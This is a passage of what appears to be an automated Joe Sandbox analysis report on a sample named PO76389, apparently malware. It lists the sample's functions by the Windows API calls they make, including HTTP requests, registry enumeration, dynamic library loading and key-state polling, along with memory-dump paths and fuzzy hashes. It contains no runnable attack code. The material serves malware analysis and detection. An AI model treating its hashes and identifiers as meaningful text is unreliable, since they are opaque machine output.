                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                    • Instruction ID: 36417bec39e57643088f3ff22c0e9180c0a1f2f3b90f6687828b719dc71d90d7
                                                    • Opcode Fuzzy Hash: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                    • Instruction Fuzzy Hash: 81418B71600208EFDB05CF55C984AAB7BB9EF48354F1480AAEB09DF225D7B9DD44CBA4
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5A93
                                                    • GetMenuItemInfoW.USER32 ref: 004F5AAF
                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004F5AF5
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005718F0,00000000), ref: 004F5B3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 919001753ee585c458ef1c4397475f8c7ae089b2ebaa1be60314e422c8538d07
                                                    • Instruction ID: e130b0369a2f427a6ec13fa7741e861c40b61ea5f5965bfc9a0d720fa5f6f215
                                                    • Opcode Fuzzy Hash: 919001753ee585c458ef1c4397475f8c7ae089b2ebaa1be60314e422c8538d07
                                                    • Instruction Fuzzy Hash: 3441AF71608705AFDB109F24D884B6AB7E4EF88314F04465EFBA59B3D1D778A804CB6A
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                      • Part of subcall function 004B7F40: _memmove.LIBCMT ref: 004B7F8F
                                                      • Part of subcall function 004BA2FB: _memmove.LIBCMT ref: 004BA33D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2411302734-567219261
                                                    • Opcode ID: 07360e70038270d79e27682beb4c5a626684f9ee06da3e2ba9b38abf5b92cb2e
                                                    • Instruction ID: 8f153bd4a2ba0b4c4da141c9767608cfa02d214cb18474d7b5430cc94944c937
                                                    • Opcode Fuzzy Hash: 07360e70038270d79e27682beb4c5a626684f9ee06da3e2ba9b38abf5b92cb2e
                                                    • Instruction Fuzzy Hash: 0831E434500609AFCF00EF59C840AEEBBB6FF14354B108A2EE422972D1DB75E985CF50
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004EC684
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004EC697
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 004EC6C7
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 458670788-1403004172
                                                    • Opcode ID: 5376d4c0137e30c7b74e4e3d715275719ff228152eadae885b98b37a7cc8656b
                                                    • Instruction ID: a6bf07e5a8dc0b60a1af7977dc15af940184e4939521d7a7822ab23b9a60cf6d
                                                    • Opcode Fuzzy Hash: 5376d4c0137e30c7b74e4e3d715275719ff228152eadae885b98b37a7cc8656b
                                                    • Instruction Fuzzy Hash: 4421E471900144AEDB149B76C886EFFBB79DF55315F10451BF421E32E0DB7D4D0AA628
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504A86
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00504AB6
                                                    • InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                      • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 1951874230-3916222277
                                                    • Opcode ID: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                    • Instruction ID: f05dd4c942cbc71359a5f3061331a873a57061654382806d8f4fd3eb51f8bd44
                                                    • Opcode Fuzzy Hash: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                    • Instruction Fuzzy Hash: 2221CFB5640208BFEB11DFA59C89EBFBAFDFB88744F10401AF605D2280EA749D059B74
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00518F69
                                                    • LoadLibraryW.KERNEL32(?), ref: 00518F70
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00518F85
                                                    • DestroyWindow.USER32(?), ref: 00518F8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                    • Instruction ID: 6c69461c21db6b75df431851a80f8d664bbfd13a0dcd1fd919c69f47df88928c
                                                    • Opcode Fuzzy Hash: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                    • Instruction Fuzzy Hash: F3219D71600205AFFF204E64EC85EFB3BAEFB59364F104629FA2497190DB71DC92A760
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FE392
                                                    • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 004FE3E6
                                                    • __swprintf.LIBCMT ref: 004FE3FF
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054DBF0), ref: 004FE43D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 30fb4e6bc8d74ab055fbb01366fe74a64d15eca005a59cb3a362aa21e7bd68f6
                                                    • Instruction ID: aa709d2c785cebab923b0862c94293c1ca4177611192ac149142d575b559ec63
                                                    • Opcode Fuzzy Hash: 30fb4e6bc8d74ab055fbb01366fe74a64d15eca005a59cb3a362aa21e7bd68f6
                                                    • Instruction Fuzzy Hash: D1217F35A40108AFCB10EBA5D885EEEBBB8EF59704B10406EF509D7351D775DA05DB60
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                      • Part of subcall function 004ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                      • Part of subcall function 004ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                      • Part of subcall function 004ED623: GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                      • Part of subcall function 004ED623: AttachThreadInput.USER32(00000000), ref: 004ED661
                                                    • GetFocus.USER32 ref: 004ED7FB
                                                      • Part of subcall function 004ED66C: GetParent.USER32(?), ref: 004ED67A
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004ED844
                                                    • EnumChildWindows.USER32(?,004ED8BA), ref: 004ED86C
                                                    • __swprintf.LIBCMT ref: 004ED886
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 215debc76e3f10b315530130232c90eedf65d27464dbd3d222d5c5d26e27b0c7
                                                    • Instruction ID: 672c91af6b99e0f8c6f757d6da6e497e659e69b4497a94da81da966030d07919
                                                    • Opcode Fuzzy Hash: 215debc76e3f10b315530130232c90eedf65d27464dbd3d222d5c5d26e27b0c7
                                                    • Instruction Fuzzy Hash: 1F11E4719002056BDB117F629C86FEA3779AF44709F0040BAFE19AA186CBB899459B74
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005118E4
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00511917
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00511A3A
                                                    • CloseHandle.KERNEL32(?), ref: 00511AB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 153ab45c3f0bfad5834dd5eb436583d3503e181c89a8764c0a5d741b4126bde2
                                                    • Instruction ID: 746d936ccc06fb4a327df516f2205442cf434aa423c7b1a55cdfc548e8d41e6d
                                                    • Opcode Fuzzy Hash: 153ab45c3f0bfad5834dd5eb436583d3503e181c89a8764c0a5d741b4126bde2
                                                    • Instruction Fuzzy Hash: F2818474A50204ABDF149F65C885FADBBF5BF44724F14805EF905AF382D7B8E9408B98
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005105DF
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0051066E
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0051068C
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005106D2
                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 005106EC
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: f3c048fb28a07a1ea83f2d230d80cc7257a55eb5603172e950d11c2387799584
                                                    • Instruction ID: 0a947df72abcbd8d9afc8049353227e915023ab15842b29dde0f778ac2771222
                                                    • Opcode Fuzzy Hash: f3c048fb28a07a1ea83f2d230d80cc7257a55eb5603172e950d11c2387799584
                                                    • Instruction Fuzzy Hash: 6C518E75A002059FDB00EFA8C4909EDFBB5FF58314B1480AAE945AB391DB74ED85CBA4
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512DE0
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512E1F
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00512E66
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00512E92
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00512E9F
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 43a70dac8460383e9a70f11d1918175595783cd18e7ffcdc4e2c621a60c7928f
                                                    • Instruction ID: cf1cfa36ef8d88a002c7c89784322a2f338a4ac976c5048892f45e47883d7240
                                                    • Opcode Fuzzy Hash: 43a70dac8460383e9a70f11d1918175595783cd18e7ffcdc4e2c621a60c7928f
                                                    • Instruction Fuzzy Hash: 72518E31204205AFD704EF65C881EABBBF9FF88708F00491EF585872A1EB35E955DB62
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                    • Instruction ID: 0c4374ef216abe855216e27854b839bfddca5707f611650429308800829360b8
                                                    • Opcode Fuzzy Hash: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                    • Instruction Fuzzy Hash: 94412435944144AFEB20DB68DC89FE9BF79FB09320F544255F829E72D0C7729D80EAA0
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005017D4
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005017FD
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050183C
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00501861
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00501869
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: dc9a0f1a0c30cd9fafcd5ac91100d45747d4a488c76d3eb8c09d95b7261f436e
                                                    • Instruction ID: 4bdbc4669fa4da2cb42ede6a70e4dee7a169cc5ab4905f01b475f023029b6775
                                                    • Opcode Fuzzy Hash: dc9a0f1a0c30cd9fafcd5ac91100d45747d4a488c76d3eb8c09d95b7261f436e
                                                    • Instruction Fuzzy Hash: 35412935A00605EFCB01EF65C981AAEBBF5FF48314B14809AF805AB362DB35ED01DB65
                                                    APIs
                                                    • GetCursorPos.USER32(000000FF), ref: 004CB749
                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                    • GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                    • GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                    • Instruction ID: e5f94dc5b858bf2ac667ee4e58fe19204a2af5f6693435fb59d08d2e39d5a33e
                                                    • Opcode Fuzzy Hash: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                    • Instruction Fuzzy Hash: 8541AD35504119BBDF159F64C845FEABBB8FF45324F20421AF828922D0C734AD94DBA4
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 004EC156
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 004EC200
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004EC208
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 004EC216
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004EC21E
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                    • Instruction ID: 609fdc246383ed5302b3c69415d1f8d849f61b3bfe8b2d57481308b391206149
                                                    • Opcode Fuzzy Hash: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                    • Instruction Fuzzy Hash: 2531CE71900259EBDB04CFA9DD8DA9E7BB5EF04316F10422AF920EA2D1C7B49905DFA0
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 004EE9CD
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE9EA
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EEA22
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004EEA48
                                                    • _wcsstr.LIBCMT ref: 004EEA52
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 5ea51ce85451fc27886b44761660f0e1c81f7bb46a924d97fd87b8ad2bfcd9e3
                                                    • Instruction ID: 1cf06891a7c365938d95402f5fb9c9122f365a71e3e8d0f423d594b81aa36b48
                                                    • Opcode Fuzzy Hash: 5ea51ce85451fc27886b44761660f0e1c81f7bb46a924d97fd87b8ad2bfcd9e3
                                                    • Instruction Fuzzy Hash: 2B21D771204250BBEB159B6BEC45E7F7BE9EF45750F10803FF809CA2A1DA69DC419264
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051DCC0
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0051DCE4
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0051DCFC
                                                    • GetSystemMetrics.USER32(00000004), ref: 0051DD24
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0050407D,00000000), ref: 0051DD42
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                    • Instruction ID: 821347a21dd2e0b37d26c4a2b83b6bf4b79ed914e47645a8e3c175c00c934904
                                                    • Opcode Fuzzy Hash: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                    • Instruction Fuzzy Hash: 2D210371614612AFDB204F78AC48BA63BB4FB55338F100B24F836C62E0D3709CA4DBA0
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ECA86
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAB8
                                                    • __itow.LIBCMT ref: 004ECAD0
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAF6
                                                    • __itow.LIBCMT ref: 004ECB07
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    • Opcode ID: 9879866ddcb2bcb332511f2f50bf0366c7b6883caf5b40a6faf8a13af0728b65
                                                    • Instruction ID: 348acf1fc326dc3859aa0af805d129f34d110bb455216f238b4aae547399fef8
                                                    • Opcode Fuzzy Hash: 9879866ddcb2bcb332511f2f50bf0366c7b6883caf5b40a6faf8a13af0728b65
                                                    • Instruction Fuzzy Hash: 5F212C717002447FDB20EA6B9C87FDF7A6CEF59715F00402AF905D7281D6B89D0687A9
                                                    APIs
                                                      • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                    • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                    • GetLastError.KERNEL32 ref: 004F6DC5
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                    • _wcsrchr.LIBCMT ref: 004F6DFB
                                                      • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6E31
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                    • String ID:
                                                    • API String ID: 3633006590-0
                                                    • Opcode ID: 3de63168f6e049903cc42754fc2e1d78db2f65216c590f3faf10944f799b436d
                                                    • Instruction ID: 747b08839da49f771d1f47035b043c7f4d8dcd5bee30761be3276dc8c1eca79e
                                                    • Opcode Fuzzy Hash: 3de63168f6e049903cc42754fc2e1d78db2f65216c590f3faf10944f799b436d
